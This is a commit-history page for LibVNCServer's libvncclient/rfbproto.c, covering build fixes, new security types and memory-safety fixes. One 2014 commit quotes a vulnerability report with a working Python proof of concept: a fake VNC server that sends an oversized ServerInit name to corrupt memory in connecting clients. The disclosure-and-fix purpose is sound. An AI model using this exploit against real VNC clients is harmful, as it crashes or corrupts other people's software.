summaryrefslogtreecommitdiffstats
path: root/libvncclient/rfbproto.c
Commit message (Collapse)AuthorAgeFilesLines
* Fix building on OSX.Christian Beier2016-11-241-1/+1
|
* Fix heap overflows in the various rectangle fill functionsJosef Gajdusek2016-11-141-0/+24
| | | | | | Altough rfbproto.c does check whether the overall FramebufferUpdate rectangle is too large, some of the individual encoding decoders do not, which allows a malicious server to overwrite parts of the heap.
* Merge pull request #110 from AlexejStukov/patch-1Christian Beier2016-04-121-1/+2
|\ | | | | break statement out of case
| * break statement out of caseNorrec2016-04-071-1/+2
| |
* | Fix buffer overflow when applying client encodingszbierak2016-04-121-1/+2
|/
* Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle()SpaceOne2016-01-271-0/+8
|
* Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f.Christian Beier2015-04-171-0/+4
|
* Revert "LibVNCClient: Add H.264 encoding for framebuffer updates"Christian Beier2015-04-171-24/+0
| | | | | | | | This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c. Conflicts: configure.ac libvncclient/h264.c
* Merge pull request #69 from nopdotcom/masterChristian Beier2015-04-171-1/+4
|\ | | | | Avoid divide-by-zero in raw encoding (OSX RealVNC)
| * Avoid divide-by-zero in raw encoding (OSX RealVNC)Jay Carlson2015-03-271-1/+4
| | | | | | | | | | | | | | | | | | OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines. The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | Initialize libgcrypt before useFloris Bos2015-01-021-0/+10
|/ | | | | | | | | | | | https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version" Closes issue #45 Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubunutu package) connecting to a Mac Mini. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption.Christian Beier2014-10-101-1/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-201-1/+6
| | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintfDaniel Cohen Gindi2014-09-021-0/+4
| | | | | | | | | In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentationJohannes Schindelin2014-08-161-2/+2
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return valuenewsoft2014-08-151-3/+7
| | | | | | If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg.Matthias Treydte2014-06-231-0/+2
|
* libvncclient: If we have TLS support, enable VeNCrypt by defaultJohannes Schindelin2014-04-051-0/+3
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updatesDavid Verbeiren2013-01-251-0/+24
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API. This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes... This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU). With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions. Instructions/Requirements: * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804 * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows: cd libva git checkout v1.0-branch ./autogen.sh make sudo make install cd .. git clone git://anongit.freedesktop.org/vaapi/intel-driver cd intel-driver git checkout v1.0-branch ./autogen.sh make sudo make install Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3)Raphael Kubo da Costa2012-09-141-0/+1
|
* Tune the definitions needed when building with -ansi.Raphael Kubo da Costa2012-09-141-0/+1
| | | | | | | | | | | | | The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation. However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some no too unimportant errors.Christian Beier2012-05-091-2/+2
|
* LibVNCClient: #undef these types in case it's WIN32.Christian Beier2012-05-031-4/+4
| | | | | The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius ↵Monkey2012-04-231-0/+8
| | | | | | (Boobius) on 6/1/11. Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860
* LibVNCClient: Remove all those WITH_CLIENT_TLS #ifdefs and move GnuTLS ↵Christian Beier2012-04-151-12/+1
| | | | specific functionality into tls_gnutls.c.
* When GetCredential() callback is not set, don't use authentications ↵Christian Beier2011-11-091-2/+2
| | | | | | | requiring it. The auth methods that employ Getcredential() will only be used if the client's GetCredential callback is actually set.
* Remove useless comparisons that always evaluate to false.Christian Beier2011-03-171-6/+1
| | | | | There can not be more than 255 security types and MSLogon is RFB 3.6 only.
* Fix (most) MinGW32 compiler warnings.Christian Beier2011-03-171-0/+2
|
* Let libvncclient build with gcrypt for MinGW32 builds.Christian Beier2011-03-121-0/+4
| | | | Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Add ARD (Apple Remote Desktop) security type supportVic Lee2011-01-311-0/+216
| | | | | Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Christian Beier <dontmind@freeshell.org>
* Put files used by both libs into a 'common' dir.Christian Beier2011-01-251-2/+2
| | | | | | | | | No functional changes. All files used by _both_ libvncserver and libvncclient are put into a 'common' directory and references from other files as well as Autotools and CMake build systems are updated. Signed-off-by: Christian Beier <dontmind@freeshell.org>
* libvnc[server|client]: implement xvp VNC extension.Christian Beier2010-11-021-0/+52
| | | | | | | This implements the xvp VNC extension, which is described in the community version of the RFB protocol: http://tigervnc.sourceforge.net/cgi-bin/rfbproto It is also mentioned in the official RFB protocol.
* Only define strncasecmp to _strnicmp when using MS compiler.Christian Beier2010-10-211-5/+1
| | | | | | | Redefining strncasecmp to _strnicmp makes libvncclient hang forever in SetFormatAndEncodings() on Windows when built with MinGW64. Reported by Tobias Doerffel <tobias.doerffel@gmail.com>, thanks!
* IP QoS support in libvncclient.Christian Beier2010-09-291-0/+3
| | | | | | | | | | This enables setting the DSCP/Traffic Class field of IP/IPv6 packets sent by a client. For example starting a client with -qosdscp 184 marks all outgoing traffic for expedited forwarding. Implementation for Win32 is still a TODO, though. See http://betelco.blogspot.com/2009/03/dscp-marking-under-windows-at.html for an overview of the Win32 QoS API mess...
* Fix MinGW32 compilation with libjpeg.Christian Beier2010-09-061-0/+3
| | | | | | | | | MinGW32 (or more exactly, a rpcndr.h file included by winsock2.h) typedefs a 'boolean' type that jmorecfg.h included by jpeglib.h also tries to typedef. So, tell the jpeg headers. Closes: 3007302
* libvncclient: add ipv6 supportVic Lee2010-07-081-13/+25
| | | | | | | | [jes: pulled the "host" declarations into the conditionally compiled blocks where that variable is used. Also fixed non-IPv6 connections.] Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* libvncclient: rfbResizeFrameBuffer should also set updateRect.runge2010-05-081-0/+9
|
* Fix compilation without TLSJohannes Schindelin2010-03-131-1/+10
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Add UltraVNC Repeater support in libvncclientVic Lee2010-01-161-0/+45
| | | | | | | [jes: adjusted coding style, made sure port is initialized correctly] Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Add support for viewers to select security types on demandVic Lee2010-01-011-6/+53
| | | | | Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix version checking (>=3.8) for rfbVncAuthOK confirmation when no password ↵Vic Lee2009-12-221-2/+4
| | | | | | | | | | | | required It seems that vino does not send AuthOK when there is no password with anonymous TLS, and it seems that vino is the only <3.8 VNC server that handles anonymous TLS at all, so let's not wait for the packet that will never come. Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix checks for socket values, 0 is a legal value.Christian Beier2009-11-111-1/+1
| | | | | | | | | | To make this work, we also have to initialize sockets to a default value of -1. Also close a client listen socket if it's open. Signed-off-by: Christian Beier <dontmind@freeshell.org> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Merge branch 'VeNCrypt'Johannes Schindelin2009-11-021-91/+324
|\
| * Add MSLogon security typeVic Lee2009-11-021-8/+116
| | | | | | | | | | Signed-off-by: Vic Lee <llyzs@163.com> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
| * Add VeNCrypt support in libvncclientVic Lee2009-10-021-1/+74
| | | | | | | | Signed-off-by: Vic Lee <llyzs@163.com>
| * Add anonymous TLS support in libvncclientVic Lee2009-10-021-91/+143
| | | | | | | | Signed-off-by: Vic Lee <llyzs@163.com>
* | libvncclient: Add FinishedFrameBufferUpdate callbackAlexander Dorokhine2009-10-301-0/+3
| | | | | | | | | | | | When working on a program which searches the display for some image, one does not want to search again without getting an FB update. Add a callback to make this possible.
* | Some broken build environments treat fprintf(fh, buf) as a fatal error...runge2009-10-071-1/+1
| |
* | mingw32 crosscompile fixes.Christian Beier2009-10-021-0/+2
|/ | | | | | | | | | | SOCKET is redefined in winsock2.h so #undef it where winsock2.h is included. The changes in rfbproto.c circumvent crosscompiler errors like 'S_IFMT' undeclared ...', the Makefile.am changes avoid building linux specific stuff for a win32 host target. Also added configure option to specify sdl-config. Signed-off-by: Christian Beier <dontmind@freeshell.org> Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix IsUnixSocket()Christian Beier2009-10-021-1/+1
| | | | | | | | This is a pure functionality fix: according to its manpage, stat() returns 0 on success. Checking for a return value of zero fixes incorrect results of IsUnixSocket(). Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>